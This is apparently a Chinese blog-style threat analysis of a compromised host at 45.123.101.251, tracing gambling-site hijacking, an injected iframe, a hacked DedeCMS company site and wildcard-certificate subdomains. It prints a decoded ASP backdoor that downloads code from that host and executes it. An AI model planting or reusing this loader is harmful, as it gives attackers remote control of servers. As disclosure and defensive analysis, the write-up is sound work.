已知的文件有:
http://45.123.101.251:5520/a.jpg
http://45.123.101.251:5520/123.jpg
http://45.123.101.251:5520/671.js
http://45.123.101.251:5520/M161.txt
http://45.123.101.251:5520/M161.txt?.html
該殭屍網絡主機端口有ftp:21
phpMyAdmin999 : http://45.123.101.251:999
- 綁定過的域名如下:
- 2019-12-18-----2019-12-1819399000.com
- 2019-12-18-----2019-12-1819399b.com
- 2019-12-18-----2019-12-18974168.com
- 2019-08-10-----2019-10-10dl.v56888.com
- 2019-07-12-----2019-07-12www.v1622.com
- 2019-07-12-----2019-07-12v1622.com
- 2019-05-20-----2019-05-201366.am
- 2019-05-07-----2019-05-18512855.com
- 2019-04-14-----2019-05-14www-1366e.com
- 2019-05-12-----2019-05-121366aa.net
- 2016-11-28-----2016-11-28ylg12.com
該殭屍主機上曾經綁定的網站記錄均爲境外賭博網址,使用後門文件遠程控制目標主機,樣本文件內容(文件)爲asp加密後的代碼,經過解析代碼如下:
<%@ LANGUAGE = VBScript%><%
Server.ScriptTimeout=999999999
UserPass="xxoo"
mNametitle ="一匹黑馬"
function BytesToBstr(body,Cset)
dim objstream
set objstream = Server.CreateObject("adodb.stream")
objstream.Type = 1
objstream.Mode =3
objstream.Open
objstream.Write body
objstream.Position = 0
objstream.Type = 2
objstream.Charset = Cset
BytesToBstr = objstream.ReadText
objstream.Close
set objstream = nothing
End function
function PostHTTPPage(url)
dim Http
set Http=server.createobject("MSXML2.SERVERXMLHTTP.3.0")
Http.open "GET",url,false
Http.setRequestHeader "CONTENT-TYPE", "application/x-www-form-urlencoded"
Http.send
if Http.readystate<>4 then
exit function
End if
PostHTTPPage=bytesToBSTR(Http.responseBody,"gbk")
set http=nothing
if err.number<>0 then err.Clear
End function
dim aspCode
aspCode=CStr(Session("aspCode"))
if aspCode="" or aspCode=null or isnull(aspCode) then
aspCode=PostHTTPPage("http://45.123.101.251:5520/a.jpg")
Session("aspCode") =aspCode
End if
execute aspCode
%>
△ 關於惡意病毒殭屍網絡主機ip45.123.101.251分析最新後續:
1. 根據解析,當樣本後門文件指向並加載該鏈接【http://45.123.101.251:5520/671.js】會自動加載一個全屏iframe框架 ,該惡意框架指向地址【https://sdfhu1.com/671.html】,該惡意腳本由代號【shengxiaon】的 匿名個人編寫後經由各路木馬網站廣泛傳播。
2. 再一步測探【http://45.123.101.251:5520/】僞造了名爲【瀋陽榮偉鳴智能技術有限公司】的主頁代碼,由於域名攔截故此惡意主機並不能完全將【瀋陽榮偉鳴智能技術有限公司】服務器內的圖片等js css文件資源竊取,所以可以看到【http://45.123.101.251:5520/】頁面完全一團糟。
3. 繼續測探名爲【瀋陽榮偉鳴智能技術有限公司】的實際域名爲【http://www.rongweiming.com】,查看此網址源代碼部分 發現此網址已經淪陷許久,經該網址新聞動態得知此網站管理員至少已經停止維護一年有餘,經分析該網站爲織夢cms模板製作,故 極大可能是由於織夢cms某版本漏洞導致此網站被掛馬,由於未知原因導致該惡意代碼並未顯示惡意標題惡意網址等信息。
4. 進一步探測,由【http://www.rongweiming.com】主頁被掛馬信息解密得出以下內容:
百人牛牛,百人牛牛遊戲,百人牛牛遊戲平臺
百人牛牛遊戲▓【671311.com】▓百人牛牛遊戲平臺下載,真錢百人牛牛棋牌app,真人百人牛牛平臺安卓版下載,用錢玩的百人牛牛集合!註冊就送現金,趕緊加入吧!美女玩家陪玩,最後7天機不可失期待您的加入!
5. 繼續往下探測,此【671311.com】網址爲賭博網站中轉頁,此賭博網站均爲劫持某一缺陷主機,從而導致衍生出無數以【https://******.syyt365.com/】爲網址的子域名,該賭博網址常用名【K8彩樂園、百人牛牛,百人牛牛遊戲,百人牛牛遊戲平臺】由中轉頁進入賭博網站主頁面的時候我們會發現,該域名繼承了主域名【https://syyt365.com/】的ssl證書,所以此惡意網址在主流瀏覽器打開均會顯示爲安全網站不會被輕易屏蔽,此時 有的人可能就要問了,那爲啥一個賭博網站還會有ssl HTTPS安全證書,在此解答一下,一是爲了不會被輕易屏蔽,二是爲了坑害那些幻想網上賭博就能一夜發大財的可憐人罷了,三是 衆所周知,ssl證書大概率是充錢就會有的東西,本次故事主人公 - 域名【https://syyt365.com/】配置的爲 “Cloudflare免費SSL” 。該免費證書頒發的泛網址爲【*.syyt365.com】,這也就導致了無論創建多少子域名都將自動繼承主域名下的ssl證書,反之,如果單獨授權給【www.syyt365.com】則不會造成以上證書繼承的嚴重影響。
6. 看到這裏,終於幕後被淪陷殭屍終於浮出水面了對不對。這個步驟請各位看官先自動遺忘第5步驟的主域名,讓我們繼續深挖殭屍主機幕後的祕密。我們接着來分析,經探測,該賭博網站服務器類型爲【yunjiasu-nginx】,顧名思義,yunjiasu 等價於 雲加速,雲加速則是爲國內大頭百度公司旗下的線上雲平臺管理系統(此線索爲鍥子)。繼續往下溯源,經分析此賭博網站文件圖片js css等資源均存放在路徑1【https://images.budiaodanle.com/ 該網址無線索,至少從名稱來看是個腦殘人創建的】和路徑2【www.****.syyt365.com/k8/具體文件夾名稱】之內,繼續進行下一步,查看此賭博網站文件大部分url均爲上述路徑2 ,俗話說 千里之外取敵將首級才能運籌帷幄主導一場戰爭的節奏,直接探測主域名【https://syyt365.com/】
7. 你說驚喜不驚喜 ,好巧不巧該殭屍主機綁定的主域名竟然能 直接打開並且運行,好戲來了。
我們打開主域名,不知道你們怎麼想的,我打開第一眼,真的會有公司用一行大大的漢字當logo嘛 = =!,把我雷到五雷轟頂了可以說,我們繼續,經過五分鐘的觀察發現:該主域名網站粗糙至極各項功能除頁面切換外均不能正常使用和展示,且網站尾部出現樣式完全亂套的情況,由於此網站移動端沒有正確配置導致移動端導航直接加載至pc端尾部,該網站聯繫方式竟然爲4001-000-000,由此我產生了深深的懷疑,真的有公司會使用如此粗糙的網站嘛,對於我這個愛譴責的工程師來講表示強烈網站......
8.重點來了!我們在此網站底部可以看到【 技術支持:寬敬科技】字樣,接觸過網站的人大多都知道,此類版權信息不是借用別人的網站模板就是站羣設計雷同樣式。直接超鏈接點進去【http://kindjob.cn/】蘇州崑山IT培訓機構 - 鑑定完畢......
那麼由此可知,該網站很可能是該培訓機構的學員的課後作業所創建的,爲什麼呢,往下看。我們直接搜索【紐約婚紗】關鍵詞......可以說相當恐怖了,還有誰會說這不是批量製作的呢。
9. 總結: 該主域名網站內容是上述培訓機構學員測試作業等等,由於該服務器主機根本沒有入侵防護或幾乎很少的主機防護措施,導致駭客成功,入侵隨意種植木馬間接進行服務器的遠控,大量的創建賭博網站子域名進行各種方式的域名跳轉,進一步給別人的網站也帶來不可預估的嚴重後果。
經探測,該域名被惡意創建的賭博網站子域名有: